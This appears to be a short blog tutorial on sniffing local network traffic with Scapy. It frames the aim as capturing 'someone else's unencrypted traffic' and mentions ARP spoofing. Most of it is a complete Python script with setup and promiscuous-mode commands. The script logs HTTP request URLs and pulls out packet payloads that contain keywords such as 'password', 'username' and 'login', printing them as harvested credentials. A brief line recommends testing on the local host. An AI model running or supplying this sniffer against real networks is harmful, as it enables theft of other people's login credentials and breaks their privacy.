sniff network /w scapy

There are always chances to get someone else’s unencrypted traffic especially in local network. We might use ARP-spoof, poisoning, gateway attack whatever, but Scapy is the one of great toot to check network environment.

Pres-requisite

$sudo apt-get install python-scapy python-pip
$pip install scapy_http

Enable Promiscuous mode on network interface
$sudo ifconfig interface(eth0 whatever) promisc

It is always best to try it on bridged network. To avoid interference, testing on local host machine would be the best practice.

import scapy.all as scapy
from scapy_http import http
import argparse
def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--interface", dest="interface",
                        help="Interface name")
    options = parser.parse_args()
    return options
def sniff_packet(interface):
    scapy.sniff(iface=interface, store=False, prn=process_packets)
def get_url(packet):
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_credentials(packet):
    if packet.haslayer(scapy.Raw):
        load = packet[scapy.Raw].load
        keywords = ["login", "submission","challenge","password", "username", "user", "pass"]
        for keyword in keywords:
            if keyword in load:
                return load
def process_packets(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] Http Request >> " + url)
        credentials = get_credentials(packet)
        if credentials:
            print("[+] Someone has submitted flag, interested? " + credentials + "\n\n")
options = get_arguments()
sniff_packet(options.interface)

Leave a Reply

Your email address will not be published. Required fields are marked *